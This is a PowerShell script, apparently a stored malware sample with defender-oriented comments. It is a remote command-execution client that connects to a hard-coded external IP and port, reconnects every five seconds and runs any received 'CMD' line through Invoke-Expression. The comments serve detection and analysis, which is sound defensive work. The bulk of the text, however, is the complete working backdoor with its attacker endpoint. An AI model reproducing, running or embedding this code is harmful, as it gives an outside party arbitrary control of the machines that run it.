#
# ID: 816716
# Name: PowerShell TCP RCI Payload
# Description: PowerShell Remote Code Injection client (payload)
# Public: 0
# Creation/last edit date (UTC): 2023-11-08 08:13:07
#
# ANALYSIS NOTES (defender view)
# This sample is a remote command-execution client: it dials out to a
# hard-coded TCP endpoint, reads newline-terminated text from the socket,
# and runs any line of the form "CMD <text>" through Invoke-Expression.
# Only a StreamReader is created on the stream; nothing visible in this
# script writes to the socket, so output and errors stay on the local
# output stream unless a received command sends them elsewhere.
#
# Observable behaviour that detection can key on:
#   - a PowerShell host process opening outbound TCP to the address and
#     port below, retried about every 5 seconds while the peer is down;
#   - Invoke-Expression applied to data read from a network stream, which
#     PowerShell Script Block Logging (event ID 4104) records when enabled;
#   - plaintext "CMD " line prefixes on the wire, with no TLS and no
#     authentication of the peer.

# Hard-coded remote endpoint; both values are indicators taken as-is from the sample.
$socketHost = "162.19.224.235"
$socketPort = "8880"

# Outer loop never exits: every disconnect or exception leads to a new connection attempt.
while ($true) {
    try {
        # Outbound connection from the host running the script to the remote endpoint.
        $tcpConnection = New-Object System.Net.Sockets.TcpClient($socketHost, $socketPort)
        $tcpStream = $tcpConnection.GetStream()
        $reader = New-Object System.IO.StreamReader($tcpStream)

        # Poll the socket for as long as the client object reports itself connected.
        while ($tcpConnection.Connected) {
            # Drain every line that is currently buffered or readable.
            while ($tcpStream.DataAvailable -or $reader.Peek() -ne -1 ) {
                $response = $reader.ReadLine()
                # Line protocol: first space-separated token is the verb, the rest is the argument.
                $prefix = $response.Split(" ", 2)[0]
                if ($prefix -eq "CMD") {
                    $command = $response.Split(" ", 2)[1]
                    # Remote-controlled text is evaluated as PowerShell with the privileges
                    # of the current process; there is no allow-list, signature check or
                    # validation between the socket and the interpreter.
                    Invoke-Expression $command
                }
            }
            # 500 ms idle delay between polls.
            start-sleep -Milliseconds 500
        }
    } catch {
        # Connection and execution errors are only printed locally; the loop continues.
        Write-Output "Err:`n$_"
    }
    # 5 s back-off before reconnecting, which yields a regular retry cadence in network logs.
    start-sleep -Milliseconds 5000
}

# Not reached: the while ($true) loop above contains no break, so these
# cleanup calls never execute.
$reader.Close()
$tcpConnection.Close()